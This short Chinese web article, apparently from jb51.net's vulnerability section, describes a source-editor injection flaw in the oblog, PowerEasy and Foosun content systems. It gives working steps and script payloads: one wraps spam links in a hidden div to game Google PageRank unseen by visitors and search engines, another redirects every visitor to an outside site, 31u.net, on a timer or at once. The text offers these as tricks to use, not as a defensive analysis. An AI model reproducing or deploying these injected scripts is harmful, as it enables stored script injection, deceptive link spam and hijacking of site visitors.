漏洞研究

关注公众号 jb51net

关闭
首页 > 实用技巧 > 漏洞研究 > 程序漏洞

关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析

投稿:mdxy-dxy

这篇文章主要介绍了关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析

目前的oblog、动易、风讯等一系列著名的系统,都存在源码编辑漏洞。 

具体操作是: 

1,进入"源码"编辑 

2,输入阶段公分四段: 

第一段:<此处输入正文,做事需要手下留情嘛,来点实际内容> 
第二段:<script>document.write(’<div style="display:none">’);</script> 
第三段:<此处输入作弊链接,获取google的pr值,此处的内容将不会被浏览者看 到,且不会被搜索引擎发现> 
第四段:<SCRIPT>window.setTimeout("Timer()", 1000);function Timer(){document.location=’http://31u.net’;}</SCRIPT> 
也可以不设置时间或将时间设置为0,那么点击该页面后将直接跳转到指定页面。 

阅读全文